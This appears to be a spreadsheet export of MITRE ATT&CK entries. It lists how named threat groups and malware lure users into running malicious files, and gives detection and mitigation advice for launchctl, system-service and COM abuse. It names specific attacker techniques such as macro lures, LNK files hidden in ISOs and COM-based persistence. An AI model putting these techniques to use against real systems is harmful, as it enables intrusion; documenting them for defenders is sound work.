During [Operation Sharpshooter](https://attack.mitre.org/campaigns/C0013), the threat actors relied on victims executing malicious Microsoft Word or PDF files.(Citation: McAfee Sharpshooter December 2018) 
Operation Spalax
During [Operation Spalax](https://attack.mitre.org/campaigns/C0005), the threat actors relied on a victim to open a PDF document and click on an embedded malicious link to download malware.(Citation: ESET Operation Spalax Jan 2021) 
APT-C-36
[APT-C-36](https://attack.mitre.org/groups/G0099) has prompted victims to accept macros in order to execute the subsequent payload.(Citation: QiAnXin APT-C-36 Feb2019)
APT12
[APT12](https://attack.mitre.org/groups/G0005) has attempted to get victims to open malicious Microsoft Word and PDF attachment sent via spearphishing.(Citation: Moran 2014)(Citation: Trend Micro IXESHE 2012)
APT19
[APT19](https://attack.mitre.org/groups/G0073) attempted to get users to launch malicious attachments delivered via spearphishing emails.(Citation: FireEye APT19)
APT28
[APT28](https://attack.mitre.org/groups/G0007) attempted to get users to click on Microsoft Office attachments containing malicious macro scripts.(Citation: Unit 42 Sofacy Feb 2018)(Citation: Accenture SNAKEMACKEREL Nov 2018)(Citation: Secureworks IRON TWILIGHT Active Measures March 2017)
APT29
[APT29](https://attack.mitre.org/groups/G0016) has used various forms of spearphishing attempting to get a user to open attachments, including, but not limited to, malicious Microsoft Word documents, .pdf, and .lnk files. (Citation: F-Secure The Dukes)(Citation: ESET T3 Threat Report 2021)(Citation: Secureworks IRON HEMLOCK Profile)
APT30
[APT30](https://attack.mitre.org/groups/G0013) has relied on users to execute malicious file attachments delivered via spearphishing emails.(Citation: FireEye APT30)
APT32
[APT32](https://attack.mitre.org/groups/G0050) has attempted to lure users to execute a malicious dropper delivered via a spearphishing attachment.(Citation: ESET OceanLotus)(Citation: Cybereason Oceanlotus May 2017)(Citation: ESET OceanLotus Mar 2019)(Citation: FireEye APT32 April 2020)(Citation: Amnesty Intl. Ocean Lotus February 2021)
APT33
[APT33](https://attack.mitre.org/groups/G0064) has used malicious e-mail attachments to lure victims into executing malware.(Citation: Microsoft Holmium June 2020)
APT37
[APT37](https://attack.mitre.org/groups/G0067) has sent spearphishing attachments attempting to get a user to open them.(Citation: FireEye APT37 Feb 2018)
APT38
[APT38](https://attack.mitre.org/groups/G0082)  has attempted to lure victims into enabling malicious macros within email attachments.(Citation: CISA AA20-239A BeagleBoyz August 2020)
APT39
[APT39](https://attack.mitre.org/groups/G0087) has sent spearphishing emails in an attempt to lure users to click on a malicious attachment.(Citation: FireEye APT39 Jan 2019)(Citation: BitDefender Chafer May 2020)(Citation: Symantec Chafer February 2018)(Citation: FBI FLASH APT39 September 2020)
Ajax Security Team
[Ajax Security Team](https://attack.mitre.org/groups/G0130) has lured victims into executing malicious files.(Citation: FireEye Operation Saffron Rose 2013)
Andariel
[Andariel](https://attack.mitre.org/groups/G0138) has attempted to lure victims into enabling malicious macros within email attachments.(Citation: AhnLab Andariel Subgroup of Lazarus June 2018)
Aoqin Dragon
[Aoqin Dragon](https://attack.mitre.org/groups/G1007) has lured victims into opening weaponized documents, fake external drives, and fake antivirus to execute malicious payloads.(Citation: SentinelOne Aoqin Dragon June 2022)
BITTER
[BITTER](https://attack.mitre.org/groups/G1002) has attempted to lure victims into opening malicious attachments delivered via spearphishing.(Citation: Cisco Talos Bitter Bangladesh May 2022)(Citation: Forcepoint BITTER Pakistan Oct 2016)
BRONZE BUTLER
[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) has attempted to get users to launch malicious Microsoft Word attachments delivered via spearphishing emails.(Citation: Symantec Tick Apr 2016)(Citation: Trend Micro Tick November 2019)
BlackTech
[BlackTech](https://attack.mitre.org/groups/G0098) has used e-mails with malicious documents to lure victims into installing malware.(Citation: TrendMicro BlackTech June 2017)(Citation: NTT Security Flagpro new December 2021)	 
CURIUM
[CURIUM](https://attack.mitre.org/groups/G1012) has lured users into opening malicious files delivered via social media.(Citation: Microsoft Iranian Threat Actor Trends November 2021)
Cobalt Group
[Cobalt Group](https://attack.mitre.org/groups/G0080) has sent emails containing malicious attachments that require users to execute a file or macro to infect the victim machine.(Citation: Talos Cobalt Group July 2018)(Citation: Unit 42 Cobalt Gang Oct 2018)
Confucius
[Confucius](https://attack.mitre.org/groups/G0142) has lured victims to execute malicious attachments included in crafted spearphishing emails related to current topics.(Citation: Uptycs Confucius APT Jan 2021)
Dark Caracal
[Dark Caracal](https://attack.mitre.org/groups/G0070) makes their malware look like Flash Player, Office, or PDF documents in order to entice a user to click on it.(Citation: Lookout Dark Caracal Jan 2018)
DarkHydrus
[DarkHydrus](https://attack.mitre.org/groups/G0079) has sent malware that required users to hit the enable button in Microsoft Excel to allow an .iqy file to be downloaded.(Citation: Unit 42 DarkHydrus July 2018)(Citation: Unit 42 Playbook Dec 2017)
Darkhotel
[Darkhotel](https://attack.mitre.org/groups/G0012) has sent spearphishing emails in an attempt to lure users into clicking on a malicious attachments.(Citation: Securelist Darkhotel Aug 2015)(Citation: Microsoft DUBNIUM July 2016)
Dragonfly
[Dragonfly](https://attack.mitre.org/groups/G0035) has used various forms of spearphishing in attempts to get users to open malicious attachments.(Citation: Gigamon Berserk Bear October 2021)
EXOTIC LILY
[EXOTIC LILY](https://attack.mitre.org/groups/G1011) has gained execution through victims clicking on malicious LNK files contained within ISO files, which can execute hidden DLLs within the ISO.(Citation: Google EXOTIC LILY March 2022)(Citation: Proofpoint Bumblebee April 2022)
Earth Lusca
[Earth Lusca](https://attack.mitre.org/groups/G1006) required users to click on a malicious file for the loader to activate.(Citation: TrendMicro EarthLusca 2022)
Elderwood
[Elderwood](https://attack.mitre.org/groups/G0066) has leveraged multiple types of spearphishing in order to attempt to get a user to open attachments.(Citation: Symantec Elderwood Sept 2012)(Citation: CSM Elderwood Sept 2012)
Ember Bear
[Ember Bear](https://attack.mitre.org/groups/G1003) has attempted to lure victims into executing malicious files.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )
FIN4
[FIN4](https://attack.mitre.org/groups/G0085) has lured victims to launch malicious attachments delivered via spearphishing emails (often sent from compromised accounts).(Citation: FireEye Hacking FIN4 Dec 2014)(Citation: FireEye Hacking FIN4 Video Dec 2014)
FIN6
[FIN6](https://attack.mitre.org/groups/G0037) has used malicious documents to lure victims into allowing execution of PowerShell scripts.(Citation: Visa FIN6 Feb 2019)
FIN7
[FIN7](https://attack.mitre.org/groups/G0046) lured victims to double-click on images in the attachments they sent which would then execute the hidden LNK file.(Citation: FireEye FIN7 April 2017)(Citation: eSentire FIN7 July 2021)(Citation: CrowdStrike Carbon Spider August 2021)
FIN8
[FIN8](https://attack.mitre.org/groups/G0061) has used malicious e-mail attachments to lure victims into executing malware.(Citation: FireEye Obfuscation June 2017)(Citation: FireEye Fin8 May 2016)(Citation: FireEye Know Your Enemy FIN8 Aug 2016)
Ferocious Kitten
[Ferocious Kitten](https://attack.mitre.org/groups/G0137) has attempted to convince victims to enable malicious content within a spearphishing email by including an odd decoy message.(Citation: Kaspersky Ferocious Kitten Jun 2021)
Gallmaker
[Gallmaker](https://attack.mitre.org/groups/G0084) sent victims a lure document with a warning that asked victims to “enable content” for execution.(Citation: Symantec Gallmaker Oct 2018)
Gamaredon Group
[Gamaredon Group](https://attack.mitre.org/groups/G0047) has attempted to get users to click on Office attachments with malicious macros embedded.(Citation: TrendMicro Gamaredon April 2020)(Citation: ESET Gamaredon June 2020)(Citation: Symantec Shuckworm January 2022)(Citation: CERT-EE Gamaredon January 2021)(Citation: Microsoft Actinium February 2022)(Citation: Unit 42 Gamaredon February 2022)(Citation: Secureworks IRON TILDEN Profile)
Gorgon Group
[Gorgon Group](https://attack.mitre.org/groups/G0078) attempted to get users to launch malicious Microsoft Office attachments delivered via spearphishing emails.(Citation: Unit 42 Gorgon Group Aug 2018)
HEXANE
[HEXANE](https://attack.mitre.org/groups/G1001) has relied on victim's executing malicious file attachments delivered via email or embedded within actor-controlled websites to deliver malware.(Citation: SecureWorks August 2019)(Citation: Dragos Hexane)(Citation: ClearSky Siamesekitten August 2021)(Citation: Zscaler Lyceum DnsSystem June 2022)
Higaisa
[Higaisa](https://attack.mitre.org/groups/G0126) used malicious e-mail attachments to lure victims into executing LNK files.(Citation: Malwarebytes Higaisa 2020)(Citation: Zscaler Higaisa 2020)
Inception
[Inception](https://attack.mitre.org/groups/G0100) lured victims into clicking malicious files for machine reconnaissance and to execute malware.(Citation: Kaspersky Cloud Atlas December 2014)(Citation: Kaspersky Cloud Atlas August 2019)(Citation: Symantec Inception Framework March 2018)(Citation: Unit 42 Inception November 2018)
IndigoZebra
[IndigoZebra](https://attack.mitre.org/groups/G0136) sent spearphishing emails containing malicious attachments that urged recipients to review modifications in the file which would trigger the attack.(Citation: HackerNews IndigoZebra July 2021)
Indrik Spider
[Indrik Spider](https://attack.mitre.org/groups/G0119) has attempted to get users to click on a malicious zipped file.(Citation: Symantec WastedLocker June 2020) 
Kimsuky
[Kimsuky](https://attack.mitre.org/groups/G0094) has used attempted to lure victims into opening malicious e-mail attachments.(Citation: ThreatConnect Kimsuky September 2020)(Citation: VirusBulletin Kimsuky October 2019)(Citation: CISA AA20-301A Kimsuky)(Citation: Cybereason Kimsuky November 2020)(Citation: Malwarebytes Kimsuky June 2021)(Citation: Talos Kimsuky Nov 2021)
Lazarus Group
[Lazarus Group](https://attack.mitre.org/groups/G0032) has attempted to get users to launch a malicious Microsoft Word attachment delivered via a spearphishing email.(Citation: McAfee Bankshot)(Citation: Kaspersky ThreatNeedle Feb 2021)(Citation: Lazarus APT January 2022)(Citation: Qualys LolZarus)
LazyScripter
[LazyScripter](https://attack.mitre.org/groups/G0140) has lured users to open malicious email attachments.(Citation: MalwareBytes LazyScripter Feb 2021)
Leviathan
[Leviathan](https://attack.mitre.org/groups/G0065) has sent spearphishing attachments attempting to get a user to click.(Citation: Proofpoint Leviathan Oct 2017)(Citation: CISA AA21-200A APT40 July 2021)
Machete
[Machete](https://attack.mitre.org/groups/G0095) has relied on users opening malicious attachments delivered through spearphishing to execute malware.(Citation: Cylance Machete Mar 2017)(Citation: Securelist Machete Aug 2014)(Citation: ESET Machete July 2019)(Citation: 360 Machete Sep 2020)
Magic Hound
[Magic Hound](https://attack.mitre.org/groups/G0059) has attempted to lure victims into opening malicious email attachments.(Citation: ClearSky Kittens Back 3 August 2020)
Mofang
[Mofang](https://attack.mitre.org/groups/G0103)'s malicious spearphishing attachments required a user to open the file after receiving.(Citation: FOX-IT May 2016 Mofang)
Molerats
[Molerats](https://attack.mitre.org/groups/G0021) has sent malicious files via email that tricked users into clicking Enable Content to run an embedded macro and to download malicious archives.(Citation: Kaspersky MoleRATs April 2019)(Citation: Unit42 Molerat Mar 2020)(Citation: Cybereason Molerats Dec 2020)
MuddyWater
[MuddyWater](https://attack.mitre.org/groups/G0069) has attempted to get users to enable macros and launch malicious Microsoft Word documents delivered via spearphishing emails.(Citation: Unit 42 MuddyWater Nov 2017)(Citation: FireEye MuddyWater Mar 2018)(Citation: Securelist MuddyWater Oct 2018)(Citation: Talos MuddyWater May 2019)(Citation: ClearSky MuddyWater June 2019)(Citation: Reaqta MuddyWater November 2017)(Citation: Anomali Static Kitten February 2021)(Citation: Trend Micro Muddy Water March 2021)(Citation: DHS CISA AA22-055A MuddyWater February 2022)(Citation: Talos MuddyWater Jan 2022)	 
Mustang Panda
[Mustang Panda](https://attack.mitre.org/groups/G0129) has sent malicious files requiring direct victim interaction to execute.(Citation: Crowdstrike MUSTANG PANDA June 2018)(Citation: Anomali MUSTANG PANDA October 2019)(Citation: Avira Mustang Panda January 2020)(Citation: Recorded Future REDDELTA July 2020)(Citation: Google TAG Ukraine Threat Landscape March 2022)(Citation: Proofpoint TA416 Europe March 2022)
Naikon
[Naikon](https://attack.mitre.org/groups/G0019) has convinced victims to open malicious attachments to execute malware.(Citation: CheckPoint Naikon May 2020)
Nomadic Octopus
[Nomadic Octopus](https://attack.mitre.org/groups/G0133) as attempted to lure victims into clicking on malicious attachments within spearphishing emails.(Citation: Securelist Octopus Oct 2018)(Citation: ESET Nomadic Octopus 2018)
OilRig
[OilRig](https://attack.mitre.org/groups/G0049) has delivered macro-enabled documents that required targets to click the "enable content" button to execute the payload on the system.(Citation: Unit 42 OopsIE! Feb 2018)(Citation: Unit 42 QUADAGENT July 2018)(Citation: Crowdstrike Helix Kitten Nov 2018)(Citation: Check Point APT34 April 2021)
PLATINUM
[PLATINUM](https://attack.mitre.org/groups/G0068) has attempted to get users to open malicious files by sending spearphishing emails with attachments to victims.(Citation: Microsoft PLATINUM April 2016)
PROMETHIUM
[PROMETHIUM](https://attack.mitre.org/groups/G0056) has attempted to get users to execute compromised installation files for legitimate software including compression applications, security software, browsers, file recovery applications, and other tools and utilities.(Citation: Talos Promethium June 2020)(Citation: Bitdefender StrongPity June 2020)
Patchwork
[Patchwork](https://attack.mitre.org/groups/G0040) embedded a malicious macro in a Word document and lured the victim to click on an icon to execute the malware.(Citation: TrendMicro Patchwork Dec 2017)(Citation: Volexity Patchwork June 2018)
RTM
[RTM](https://attack.mitre.org/groups/G0048) has attempted to lure victims into opening e-mail attachments to execute malicious code.(Citation: Group IB RTM August 2019)
Rancor
[Rancor](https://attack.mitre.org/groups/G0075) attempted to get users to click on an embedded macro within a Microsoft Office Excel document to launch their malware.(Citation: Rancor Unit42 June 2018)
Sandworm Team
[Sandworm Team](https://attack.mitre.org/groups/G0034) has tricked unwitting recipients into clicking on spearphishing attachments and enabling malicious macros embedded within files.(Citation: ESET Telebots Dec 2016)(Citation: US District Court Indictment GRU Unit 74455 October 2020)
SideCopy
[SideCopy](https://attack.mitre.org/groups/G1008) has attempted to lure victims into clicking on malicious embedded archive files sent via spearphishing campaigns.(Citation: MalwareBytes SideCopy Dec 2021)
Sidewinder
[Sidewinder](https://attack.mitre.org/groups/G0121) has lured targets to click on malicious files to gain execution in the target environment.(Citation: ATT Sidewinder January 2021)(Citation: Rewterz Sidewinder APT April 2020)(Citation: Rewterz Sidewinder COVID-19 June 2020)(Citation: Cyble Sidewinder September 2020)
Silence
[Silence](https://attack.mitre.org/groups/G0091) attempts to get users to launch malicious attachments delivered via spearphishing emails.(Citation: Cyber Forensicator Silence Jan 2019)(Citation: SecureList Silence Nov 2017)(Citation: Group IB Silence Sept 2018)
TA2541
[TA2541](https://attack.mitre.org/groups/G1018) has used macro-enabled MS Word documents to lure victims into executing malicious payloads.(Citation: Proofpoint TA2541 February 2022)(Citation: Cisco Operation Layover September 2021)(Citation: Telefonica Snip3 December 2021)
TA459
[TA459](https://attack.mitre.org/groups/G0062) has attempted to get victims to open malicious Microsoft Word attachment sent via spearphishing.(Citation: Proofpoint TA459 April 2017)
TA505
[TA505](https://attack.mitre.org/groups/G0092) has used lures to get users to enable content in malicious attachments and execute malicious files contained in archives. For example, [TA505](https://attack.mitre.org/groups/G0092) makes their malware look like legitimate Microsoft Word documents, .pdf and/or .lnk files. (Citation: Proofpoint TA505 Sep 2017)(Citation: Proofpoint TA505 June 2018)(Citation: Proofpoint TA505 Jan 2019)(Citation: Cybereason TA505 April 2019)(Citation: ProofPoint SettingContent-ms July 2018)(Citation: Proofpoint TA505 Mar 2018)(Citation: Trend Micro TA505 June 2019)(Citation: Proofpoint TA505 October 2019)(Citation: IBM TA505 April 2020)
TA551
[TA551](https://attack.mitre.org/groups/G0127) has prompted users to enable macros within spearphishing attachments to install malware.(Citation: Unit 42 TA551 Jan 2021)
The White Company
[The White Company](https://attack.mitre.org/groups/G0089) has used phishing lure documents that trick users into opening them and infecting their computers.(Citation: Cylance Shaheen Nov 2018)
Threat Group-3390
[Threat Group-3390](https://attack.mitre.org/groups/G0027) has lured victims into opening malicious files containing malware.(Citation: Trend Micro DRBControl February 2020)
Tonto Team
[Tonto Team](https://attack.mitre.org/groups/G0131) has relied on user interaction to open their malicious RTF documents.(Citation: TrendMicro Tonto Team October 2020)(Citation: Talos Bisonal Mar 2020) 
Transparent Tribe
[Transparent Tribe](https://attack.mitre.org/groups/G0134) has used weaponized documents in e-mail to compromise targeted systems.(Citation: Proofpoint Operation Transparent Tribe March 2016)(Citation: Kaspersky Transparent Tribe August 2020)(Citation: Talos Oblique RAT March 2021)(Citation: Talos Transparent Tribe May 2021)(Citation: Unit 42 ProjectM March 2016)
Tropic Trooper
[Tropic Trooper](https://attack.mitre.org/groups/G0081) has lured victims into executing malware via malicious e-mail attachments.(Citation: Anomali Pirate Panda April 2020)
WIRTE
[WIRTE](https://attack.mitre.org/groups/G0090) has attempted to lure users into opening malicious MS Word and Excel files to execute malicious payloads.(Citation: Kaspersky WIRTE November 2021)
Whitefly
[Whitefly](https://attack.mitre.org/groups/G0107) has used malicious .exe or .dll files disguised as documents or images.(Citation: Symantec Whitefly March 2019)
Windshift
[Windshift](https://attack.mitre.org/groups/G0112) has used e-mail attachments to lure victims into executing malicious code.(Citation: SANS Windshift August 2018)
Wizard Spider
[Wizard Spider](https://attack.mitre.org/groups/G0102) has lured victims to execute malware with spearphishing attachments containing macros to download either [Emotet](https://attack.mitre.org/software/S0367), Bokbot, [TrickBot](https://attack.mitre.org/software/S0266), or [Bazar](https://attack.mitre.org/software/S0534).(Citation: CrowdStrike Grim Spider May 2019)(Citation: CrowdStrike Wizard Spider October 2020)(Citation: Mandiant FIN12 Oct 2021)
admin@338
[admin@338](https://attack.mitre.org/groups/G0018) has attempted to get victims to launch malicious Microsoft Word attachments delivered via spearphishing emails.(Citation: FireEye admin@338)
menuPass
[menuPass](https://attack.mitre.org/groups/G0045) has attempted to get victims to open malicious files such as Windows Shortcuts (.lnk) and/or Microsoft Office documents, sent via email as part of spearphishing campaigns.(Citation: PWC Cloud Hopper Technical Annex April 2017)(Citation: FireEye APT10 April 2017)(Citation: Accenture Hogfish April 2018)(Citation: FireEye APT10 Sept 2018)(Citation: District Court of NY APT10 Indictment December 2018)
Agent Tesla
[Agent Tesla](https://attack.mitre.org/software/S0331) has been executed through malicious e-mail attachments (Citation: Bitdefender Agent Tesla April 2020)
AppleJeus
[AppleJeus](https://attack.mitre.org/software/S0584) has required user execution of a malicious MSI installer.(Citation: CISA AppleJeus Feb 2021)
AppleSeed
[AppleSeed](https://attack.mitre.org/software/S0622) can achieve execution through users running malicious file attachments distributed via email.(Citation: Malwarebytes Kimsuky June 2021)
Astaroth
[Astaroth](https://attack.mitre.org/software/S0373) has used malicious files including VBS, LNK, and HTML for execution.(Citation: Securelist Brazilian Banking Malware July 2020)
BADFLICK
[BADFLICK](https://attack.mitre.org/software/S0642) has relied upon users clicking on a malicious attachment delivered through spearphishing.(Citation: Accenture MUDCARP March 2019)
BLINDINGCAN
[BLINDINGCAN](https://attack.mitre.org/software/S0520) has lured victims into executing malicious macros embedded within Microsoft Office documents.(Citation: US-CERT BLINDINGCAN Aug 2020)
Bad Rabbit
[Bad Rabbit](https://attack.mitre.org/software/S0606) has been executed through user installation of an executable disguised as a flash installer.(Citation: ESET Bad Rabbit)(Citation: Secure List Bad Rabbit)
Bandook
[Bandook](https://attack.mitre.org/software/S0234) has used lure documents to convince the user to enable macros.(Citation: CheckPoint Bandook Nov 2020) 
Bisonal
[Bisonal](https://attack.mitre.org/software/S0268) has relied on users to execute malicious file attachments delivered via spearphishing emails.(Citation: Talos Bisonal Mar 2020) 
Black Basta
[Black Basta](https://attack.mitre.org/software/S1070) has been downloaded and executed from malicious Excel files.(Citation: Trend Micro Black Basta May 2022)(Citation: Trend Micro Black Basta Spotlight September 2022)
BoomBox
[BoomBox](https://attack.mitre.org/software/S0635) has gained execution through user interaction with a malicious file.(Citation: MSTIC Nobelium Toolset May 2021)
Brute Ratel C4
[Brute Ratel C4](https://attack.mitre.org/software/S1063) has gained execution through users opening malicious documents.(Citation: Palo Alto Brute Ratel July 2022)
Bumblebee
[Bumblebee](https://attack.mitre.org/software/S1039) has relied upon a user opening an ISO file to enable execution of malicious shortcut files and DLLs.(Citation: Proofpoint Bumblebee April 2022)(Citation: Symantec Bumblebee June 2022)(Citation: Cybereason Bumblebee August 2022)(Citation: Medium Ali Salem Bumblebee April 2022)
Bundlore
[Bundlore](https://attack.mitre.org/software/S0482) has attempted to get users to execute a malicious .app file that looks like a Flash Player update.(Citation: MacKeeper Bundlore Apr 2019)
CARROTBALL
[CARROTBALL](https://attack.mitre.org/software/S0465) has been executed through users being lured into opening malicious e-mail attachments.(Citation: Unit 42 CARROTBAT January 2020)
CSPY Downloader
[CSPY Downloader](https://attack.mitre.org/software/S0527) has been delivered via malicious documents with embedded macros.(Citation: Cybereason Kimsuky November 2020)
Cardinal RAT
[Cardinal RAT](https://attack.mitre.org/software/S0348) lures victims into executing malicious macros embedded within Microsoft Excel documents.(Citation: PaloAlto CardinalRat Apr 2017)
Chaes
[Chaes](https://attack.mitre.org/software/S0631) requires the user to click on the malicious Word document to execute the next part of the attack.(Citation: Cybereason Chaes Nov 2020) 
Clambling
[Clambling](https://attack.mitre.org/software/S0660) has gained execution through luring victims into opening malicious files.(Citation: Trend Micro DRBControl February 2020)
DanBot
[DanBot](https://attack.mitre.org/software/S1014) has relied on victims' opening a malicious file for initial execution.(Citation: SecureWorks August 2019)(Citation: ClearSky Siamesekitten August 2021)
DarkTortilla
[DarkTortilla](https://attack.mitre.org/software/S1066) has relied on a user to open a malicious document or archived file delivered via email for initial execution.(Citation: Secureworks DarkTortilla Aug 2022)
Disco
[Disco](https://attack.mitre.org/software/S1088) has been executed through inducing user interaction with malicious .zip and .msi files.(Citation: MoustachedBouncer ESET August 2023)
DnsSystem
[DnsSystem](https://attack.mitre.org/software/S1021) has lured victims into opening macro-enabled Word documents for execution.(Citation: Zscaler Lyceum DnsSystem June 2022)
Dridex
[Dridex](https://attack.mitre.org/software/S0384) has relied upon users clicking on a malicious attachment delivered through spearphishing.(Citation: Checkpoint Dridex Jan 2021)
Emotet
[Emotet](https://attack.mitre.org/software/S0367) has relied upon users clicking on a malicious attachment delivered through spearphishing.(Citation: Trend Micro Banking Malware Jan 2019)(Citation: Carbon Black Emotet Apr 2019)(Citation: IBM IcedID November 2017)
EnvyScout
[EnvyScout](https://attack.mitre.org/software/S0634) has been executed through malicious files attached to e-mails.(Citation: MSTIC Nobelium Toolset May 2021)
Flagpro
[Flagpro](https://attack.mitre.org/software/S0696) has relied on users clicking a malicious attachment delivered through spearphishing.(Citation: NTT Security Flagpro new December 2021)
Grandoreiro
[Grandoreiro](https://attack.mitre.org/software/S0531) has infected victims via malicious attachments.(Citation: IBM Grandoreiro April 2020)
GuLoader
The [GuLoader](https://attack.mitre.org/software/S0561) executable has been retrieved via embedded macros in malicious Word documents.(Citation: Unit 42 NETWIRE April 2020)
Hancitor
[Hancitor](https://attack.mitre.org/software/S0499) has used malicious Microsoft Word documents, sent via email, which prompted the victim to enable macros.(Citation: FireEye Hancitor)
Heyoka Backdoor
[Heyoka Backdoor](https://attack.mitre.org/software/S1027) has been spread through malicious document lures.(Citation: SentinelOne Aoqin Dragon June 2022)
IcedID
[IcedID](https://attack.mitre.org/software/S0483) has been executed through Word documents with malicious embedded macros.(Citation: Juniper IcedID June 2020)
InvisiMole
[InvisiMole](https://attack.mitre.org/software/S0260) can deliver trojanized versions of software and documents, relying on user execution.(Citation: ESET InvisiMole June 2020)
JCry
[JCry](https://attack.mitre.org/software/S0389) has achieved execution by luring users to click on a file that appeared to be an Adobe Flash Player update installer. (Citation: Carbon Black JCry May 2019)
JSS Loader
[JSS Loader](https://attack.mitre.org/software/S0648) has been executed through malicious attachments contained in spearphishing emails.(Citation: eSentire FIN7 July 2021)
Javali
[Javali](https://attack.mitre.org/software/S0528) has achieved execution through victims opening malicious attachments, including MSI files with embedded VBScript.(Citation: Securelist Brazilian Banking Malware July 2020)
KGH_SPY
[KGH_SPY](https://attack.mitre.org/software/S0526) has been spread through Word documents containing malicious macros.(Citation: Cybereason Kimsuky November 2020)
KOCTOPUS
[KOCTOPUS](https://attack.mitre.org/software/S0669) has relied on victims clicking a malicious document for execution.(Citation: MalwareBytes LazyScripter Feb 2021) 
KONNI
[KONNI](https://attack.mitre.org/software/S0356) has relied on a victim to enable malicious macros within an attachment delivered via email.(Citation: Malwarebytes Konni Aug 2021)
KOPILUWAK
[KOPILUWAK](https://attack.mitre.org/software/S1075</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor command-line execution of the &lt;code&gt;launchctl&lt;/code&gt; command immediately followed by abnormal network connections.
File Modification
Every Launch Agent and Launch Daemon must have a corresponding plist file on disk which can be monitored. Plist files are located in the root, system, and users &lt;code&gt;/Library/LaunchAgents&lt;/code&gt; or &lt;code&gt;/Library/LaunchDaemons&lt;/code&gt; folders. [Launch Agent](https://attack.mitre.org/techniques/T1543/001) or [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) with executable paths pointing to /tmp and /Shared folders locations are potentially suspicious.
Process Creation
Monitor for newly executed daemons that may abuse launchctl to execute commands or programs.
Service Creation
Monitor for newly constructed services/daemons to execute commands or programs.
User Account Management
Prevent users from installing their own launch agents or launch daemons.
AppleJeus
[AppleJeus](https://attack.mitre.org/software/S0584) has loaded a plist file using the &lt;code&gt;launchctl&lt;/code&gt; command.(Citation: CISA AppleJeus Feb 2021)
Calisto
[Calisto](https://attack.mitre.org/software/S0274) uses launchctl to enable screen sharing on the victim’s machine.(Citation: Securelist Calisto July 2018)
LoudMiner
[LoudMiner](https://attack.mitre.org/software/S0451) launched the QEMU services in the &lt;code&gt;/Library/LaunchDaemons/&lt;/code&gt; folder using &lt;code&gt;launchctl&lt;/code&gt;. It also uses &lt;code&gt;launchctl&lt;/code&gt; to unload all [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)s when updating to a newer version of [LoudMiner](https://attack.mitre.org/software/S0451).(Citation: ESET LoudMiner June 2019)	
XCSSET
[XCSSET](https://attack.mitre.org/software/S0658) loads a system level launchdaemon using the &lt;code&gt;launchctl load -w&lt;/code&gt; command from &lt;code&gt;/System/Librarby/LaunchDaemons/ssh.plist&lt;/code&gt;.(Citation: trendmicro xcsset xcode project 2020)
macOS.OSAMiner
[macOS.OSAMiner](https://attack.mitre.org/software/S1048) has used `launchctl` to restart the [Launch Agent](https://attack.mitre.org/techniques/T1543/001).(Citation: SentinelLabs reversing run-only applescripts 2021)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor for command line invocations of tools capable of modifying services that doesn’t correspond to normal usage patterns and known software, patch cycles, etc.
File Modification
Monitor for changes made to files that may abuse system services or daemons to execute commands or programs.
Process Creation
Monitor newly executed processes that may abuse system services or daemons to execute commands or programs.
Service Creation
Monitor for newly constructed services/daemons to execute commands or programs.
Windows Registry Key Modification
Monitor for changes made to windows registry keys and/or values that may abuse system services or daemons to execute commands or programs.
Behavior Prevention on Endpoint
On Windows 10, enable Attack Surface Reduction (ASR) rules to block processes created by [PsExec](https://attack.mitre.org/software/S0029) from running. (Citation: win10_asr)
Privileged Account Management
Ensure that permissions disallow services that run at a higher permissions level from being created or interacted with by a user with a lower permission level.
Restrict File and Directory Permissions
Ensure that high permission level service binaries cannot be replaced or modified by users with a lower permission level.
User Account Management
Prevent users from installing their own launch agents or launch daemons.
TeamTNT
[TeamTNT](https://attack.mitre.org/groups/G0139) has created system services to execute cryptocurrency mining software.(Citation: Cisco Talos Intelligence Group)
</t>
  </si>
  <si>
    <t xml:space="preserve">Module Load
Monitor for COM objects loading DLLs and other modules not typically associated with the application.(Citation: Enigma MMC20 COM Jan 2017)
Process Creation
Monitor for newly executed processes that are associated with COM objects, especially those invoked by a user different than the one currently logged on.
Script Execution
Monitor for any attempts to enable scripts running on a system would be considered suspicious. Enumeration of COM objects, via [Query Registry](https://attack.mitre.org/techniques/T1012) or [PowerShell](https://attack.mitre.org/techniques/T1059/001), may also proceed malicious use.(Citation: Fireeye Hunting COM June 2019)(Citation: Enigma MMC20 COM Jan 2017)
Application Isolation and Sandboxing
Ensure all COM alerts and Protected View are enabled.(Citation: Microsoft Protected View)
Privileged Account Management
Modify Registry settings (directly or using Dcomcnfg.exe) in `HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\AppID\\{AppID_GUID}` associated with the process-wide security of individual COM applications.(Citation: Microsoft Process Wide Com Keys)
Modify Registry settings (directly or using Dcomcnfg.exe) in `HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Ole` associated with system-wide security defaults for all COM applications that do no set their own process-wide security.(Citation: Microsoft System Wide Com Keys) (Citation: Microsoft COM ACL)
Gamaredon Group
[Gamaredon Group](https://attack.mitre.org/groups/G0047) malware can insert malicious macros into documents using a &lt;code&gt;Microsoft.Office.Interop&lt;/code&gt; object.(Citation: ESET Gamaredon June 2020)	
MuddyWater
[MuddyWater](https://attack.mitre.org/groups/G0069) has used malware that has the capability to execute malicious code via COM, DCOM, and Outlook.(Citation: Securelist MuddyWater Oct 2018)(Citation: ClearSky MuddyWater June 2019)(Citation: DHS CISA AA22-055A MuddyWater February 2022)
Bumblebee
[Bumblebee](https://attack.mitre.org/software/S1039) can use a COM object to execute queries to gather system information.(Citation: Proofpoint Bumblebee April 2022)
DarkTortilla
[DarkTortilla](https://attack.mitre.org/software/S1066) has used the `WshShortcut` COM object to create a .lnk shortcut file in the Windows startup folder.(Citation: Secureworks DarkTortilla Aug 2022)
FunnyDream
[FunnyDream](https://attack.mitre.org/software/S1044) can use com objects identified with `CLSID_ShellLink`(`IShellLink` and `IPersistFile`) and `WScript.Shell`(`RegWrite` method) to enable persistence mechanisms.(Citation: Bitdefender FunnyDream Campaign November 2020)
Gelsemium
[Gelsemium](https://attack.mitre.org/software/S0666) can use the `IARPUinstallerStringLauncher` COM interface are part of its UAC bypass process.(Citation: ESET Gelsemium June 2021)
HermeticWizard
[HermeticWizard](https://attack.mitre.org/software/S0698) can execute files on remote machines using DCOM.(Citation: ESET Hermetic Wizard March 2022)
InvisiMole
